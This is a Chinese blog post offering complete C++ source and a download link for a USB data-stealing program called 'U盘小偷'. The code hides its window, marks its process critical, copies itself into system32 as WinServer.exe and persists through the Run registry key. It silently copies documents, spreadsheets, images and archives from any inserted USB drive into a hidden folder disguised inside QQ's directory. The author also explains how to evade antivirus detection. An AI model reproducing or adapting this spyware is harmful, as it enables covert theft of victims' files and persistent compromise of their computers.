不多说,直接上代码,貌似现在流行代码即文档,就不做说明了
注:
这程序360报毒,云引擎报HEUR/Malware.QVM10.Gen,要解决的话,可以把写注册表给删了,把复制自身到C盘给干掉,就不会报毒了
在http://www.virscan.org/扫描有AVG报毒,其余都不报报毒
下载地址:http://www.lanyus.com/wordpress/wp-content/uploads/2013/03/USB.rar
解压密码:www.lanyus.com
/** 版权所有 (C), 2013, 无心问世工作室 程序名: U盘小偷 作者: 无心问世 版本: v1.0 日期: 2013/3/15 描述: 复制U盘里的文档的东西,你懂的 使用此程序可随意修改,发布,但需保留作者版权信息 **/ #include <windows.h> #include <string> #include <stdio.h> #include <Dbt.h> #include <iostream> #include "io.h" #include "tlhelp32.h" #include "stdio.h" #include <tchar.h> #include <conio.h> #include <fstream> using namespace std; HANDLE hOneInstanceMutex; char to_dst[10000] = "D:\\Program Files\\Tencent\\QQ\\Bin\\Import\\"; typedef ULONG(__stdcall*PRtlAdjustPrivilege)(ULONG Privilege,int Enable,int CurrentThread,int*Enabled); typedef ULONG(__stdcall*PNtSetInformationProcess)(HANDLE ProcessHandle,ULONG InformationClass,void*Information,ULONG Length); int Getdisknumber(LPCTSTR lpRootPathName); void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir); void Dir(char *lpPath,char *dst_dir,char *dst_list_dir); LRESULT CALLBACK WndProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam); int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH]); int Safe(); int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { HMODULE ntdll; int b; PRtlAdjustPrivilege pRtlAdjustPrivilege; PNtSetInformationProcess pNtSetInformationProcess; ntdll=GetModuleHandleW(L"ntdll.dll"); pRtlAdjustPrivilege=(PRtlAdjustPrivilege)GetProcAddress(ntdll,"RtlAdjustPrivilege"); pNtSetInformationProcess=(PNtSetInformationProcess)GetProcAddress(ntdll,"NtSetInformationProcess"); pRtlAdjustPrivilege(20,1,0,&b); b=1; pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b); hOneInstanceMutex = NULL; hOneInstanceMutex = ::CreateMutex(NULL, FALSE, _T("USBSPY_is_Running")); if(GetLastError() == ERROR_ALREADY_EXISTS) { hOneInstanceMutex = NULL; b=0; pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b); return 0; } WNDCLASS wndclass; wndclass.cbClsExtra=0; wndclass.cbWndExtra=0; wndclass.hbrBackground=(HBRUSH)GetStockObject(BLACK_BRUSH); wndclass.hCursor=LoadCursor(NULL,IDC_ICON); wndclass.hIcon=LoadIcon(NULL,IDI_ASTERISK); wndclass.hInstance=hInstance; wndclass.lpfnWndProc=WndProc; wndclass.lpszClassName="usb"; wndclass.lpszMenuName=NULL; wndclass.style=CS_VREDRAW|CS_HREDRAW; RegisterClass(&wndclass); HWND hwnd; hwnd=CreateWindow("usb","",WS_OVERLAPPEDWINDOW,150,150,683,384,NULL,NULL,hInstance,NULL); ShowWindow(hwnd,SW_HIDE); UpdateWindow(hwnd); MSG msg; while(GetMessage(&msg,hwnd,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); Safe(); } b=0; pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b); return 0; } LRESULT CALLBACK WndProc( HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { switch(uMsg) { case WM_PAINT: { PAINTSTRUCT ps; BeginPaint(hwnd,&ps); EndPaint(hwnd,&ps); break; } case WM_CLOSE: { return FALSE; break; } case WM_DESTROY: { return FALSE; break; } case WM_CREATE: { Safe(); break; } case WM_DEVICECHANGE: { if(lParam!=0) { PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam; if(lpdb->dbch_devicetype==DBT_DEVTYP_VOLUME) { if(wParam==DBT_DEVICEARRIVAL) { long i,j; TCHAR buf[100]; TCHAR *cdbuf; j=100; i=GetLogicalDriveStrings(j,buf); for(j=0;j<i;j++) { cdbuf=&buf[j]; if(GetDriveType(cdbuf)==DRIVE_REMOVABLE) { char disk_number[260]; sprintf(disk_number,"%d",Getdisknumber(cdbuf)); char to_dst_dir[260]; char set_hid_dir[260]; strcpy(to_dst_dir,to_dst); strcat(to_dst_dir,disk_number); strcpy(set_hid_dir,to_dst_dir); strcat(to_dst_dir,"\\"); char imdstfile[200]; strcpy(imdstfile,cdbuf); strcat(imdstfile,"XF5201314"); fstream _file; _file.open(imdstfile,ios::in); if(_file) { continue; } CreateDirectory(to_dst_dir,NULL); ImDir(cdbuf,to_dst_dir,to_dst_dir); Dir(cdbuf,to_dst_dir,to_dst_dir); char cmdline[260]; strcpy(cmdline,"cmd /c dir \""); strcat(cmdline,cdbuf); strcat(cmdline,"\" /S /O:-D /T:W /N > \""); strcat(cmdline,set_hid_dir); strcat(cmdline,".txt\""); WinExec(cmdline,SW_HIDE); char cmdstrend[260]; strcpy(cmdstrend,"cmd /c attrib +R +S +H \""); strcat(cmdstrend,set_hid_dir); strcat(cmdstrend,"\""); WinExec(cmdstrend,SW_HIDE); char cmdstrimdir[260]; strcpy(cmdstrimdir,"cmd /c echo \"--------------------------------\" >> \""); strcat(cmdstrimdir,to_dst_dir); strcat(cmdstrimdir,"ImFileChange.txt\""); WinExec(cmdstrimdir,SW_HIDE); char cmdstrimdir2[260]; strcpy(cmdstrimdir2,"cmd /c echo \"--------------------------------\" >> \""); strcat(cmdstrimdir2,to_dst_dir); strcat(cmdstrimdir2,"FileChange.txt\""); WinExec(cmdstrimdir2,SW_HIDE); } } } } } break; } default: { return DefWindowProc(hwnd,uMsg,wParam,lParam); break; } } return 0; } int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH]) { HKEY hkResult; TCHAR Path[MAX_PATH]; strcpy(Path,"\""); strcat(Path,lpFilename); strcat(Path,"\""); LPCSTR regname="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); ret=RegSetValueEx(hkResult,keyname,0,REG_SZ,(unsigned char *)Path,sizeof(Path)); RegCloseKey(hkResult); return 0; } void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir) { char szFind[10000]; strcpy(szFind,lpPath); strcat(szFind,"\\*.*"); WIN32_FIND_DATA wfd; HANDLE hFind=FindFirstFile(szFind,&wfd); if (hFind == INVALID_HANDLE_VALUE) { FindClose(hFind); return; } else { do { if (wfd.cFileName[0] == '.') continue; if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { char szFile[10000]; char dir[10000]; strcpy(szFile,lpPath); strcpy(dir,dst_dir); strcat(szFile,"\\"); strcat(dir,"\\"); strcat(szFile,wfd.cFileName); strcat(dir,wfd.cFileName); CreateDirectory(dir,NULL); ImDir(szFile,dir,dst_list_dir); } else { char szFile[10000]; strcpy(szFile,lpPath); strcat(szFile,"\\"); strcat(szFile,wfd.cFileName); int len=strlen(szFile); char *p=&szFile[len-3]; strlwr(p); if(strcmp(p,"doc")==0||strcmp(p,"docx")==0) { char dst_file[10000]; strcpy(dst_file,dst_dir); strcat(dst_file,"\\"); strcat(dst_file,wfd.cFileName); fstream _file; _file.open(dst_file,ios::in); if(!_file) { CopyFile(szFile,dst_file,true); char cmdstrimdir1[260]; strcpy(cmdstrimdir1,"cmd /c echo \""); strcat(cmdstrimdir1,szFile); strcat(cmdstrimdir1,"\" >> \""); strcat(cmdstrimdir1,dst_list_dir); strcat(cmdstrimdir1,"ImFileChange.txt\""); WinExec(cmdstrimdir1,SW_HIDE); } else { WIN32_FIND_DATA dst; HANDLE find_dst = FindFirstFile(dst_file,&dst); LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime); if (lRet != 0) { CopyFile(szFile,dst_file,false); char cmdstrimdir2[260]; strcpy(cmdstrimdir2,"cmd /c echo \""); strcat(cmdstrimdir2,szFile); strcat(cmdstrimdir2,"\" >> \""); strcat(cmdstrimdir2,dst_list_dir); strcat(cmdstrimdir2,"ImFileChange.txt\""); WinExec(cmdstrimdir2,SW_HIDE); } FindClose(find_dst); } } } } while(FindNextFile(hFind, &wfd)); FindClose(hFind); } } void Dir(char *lpPath,char *dst_dir,char *dst_list_dir) { char szFind[10000]; strcpy(szFind,lpPath); strcat(szFind,"\\*.*"); WIN32_FIND_DATA wfd; HANDLE hFind=FindFirstFile(szFind,&wfd); if (hFind == INVALID_HANDLE_VALUE) { FindClose(hFind); return; } else { do { if (wfd.cFileName[0] == '.') continue; if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { char szFile[10000]; char dir[10000]; strcpy(szFile,lpPath); strcpy(dir,dst_dir); strcat(szFile,"\\"); strcat(dir,"\\"); strcat(szFile,wfd.cFileName); strcat(dir,wfd.cFileName); CreateDirectory(dir,NULL); Dir(szFile,dir,dst_list_dir); } else { char szFile[10000]; strcpy(szFile,lpPath); strcat(szFile,"\\"); strcat(szFile,wfd.cFileName); int len=strlen(szFile); char *p=&szFile[len-3]; strlwr(p); if(strcmp(p,"xls")==0||strcmp(p,"xlsx")==0||strcmp(p,"txt")==0||strcmp(p,"jpg")==0||strcmp(p,"png")==0||strcmp(p,"bmp")==0||strcmp(p,"rar")==0||strcmp(p,"zip")==0) { char dst_file[10000]; strcpy(dst_file,dst_dir); strcat(dst_file,"\\"); strcat(dst_file,wfd.cFileName); fstream _file; _file.open(dst_file,ios::in); if(!_file) { CopyFile(szFile,dst_file,true); char cmdstrimdir1[260]; strcpy(cmdstrimdir1,"cmd /c echo \""); strcat(cmdstrimdir1,szFile); strcat(cmdstrimdir1,"\" >> \""); strcat(cmdstrimdir1,dst_list_dir); strcat(cmdstrimdir1,"FileChange.txt\""); WinExec(cmdstrimdir1,SW_HIDE); } else { WIN32_FIND_DATA dst; HANDLE find_dst = FindFirstFile(dst_file,&dst); LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime); if (lRet != 0) { CopyFile(szFile,dst_file,false); char cmdstrimdir2[260]; strcpy(cmdstrimdir2,"cmd /c echo \""); strcat(cmdstrimdir2,szFile); strcat(cmdstrimdir2,"\" >> \""); strcat(cmdstrimdir2,dst_list_dir); strcat(cmdstrimdir2,"FileChange.txt\""); WinExec(cmdstrimdir2,SW_HIDE); } FindClose(find_dst); } } } } while(FindNextFile(hFind, &wfd)); FindClose(hFind); } } int Getdisknumber(LPCTSTR lpRootPathName) { LPTSTR lpVolumeNameBuffer=new char[12]; DWORD nVolumeNameSize=12; DWORD VolumeSerialNumber; DWORD MaximumComponentLength; LPTSTR lpFileSystemNameBuffer=new char[10]; DWORD nFileSystemNameSize=10; DWORD FileSystemFlags; ::GetVolumeInformation(lpRootPathName,lpVolumeNameBuffer,nVolumeNameSize,&VolumeSerialNumber,&MaximumComponentLength, &FileSystemFlags,lpFileSystemNameBuffer,nFileSystemNameSize); return VolumeSerialNumber; } int Safe() { char cmdmkdir[260]; strcpy(cmdmkdir,"cmd /c mkdir \""); strcat(cmdmkdir,to_dst); strcat(cmdmkdir,"\""); WinExec(cmdmkdir,SW_HIDE); TCHAR ExeFullPath[MAX_PATH]; GetModuleFileName(NULL,ExeFullPath,MAX_PATH); TCHAR NewFilePath[MAX_PATH]="C:\\WINDOWS\\system32\\WinServer.exe"; CopyFile(ExeFullPath,NewFilePath,TRUE); AutoStartSystem("WinServer",NewFilePath); return 1; }
近期评论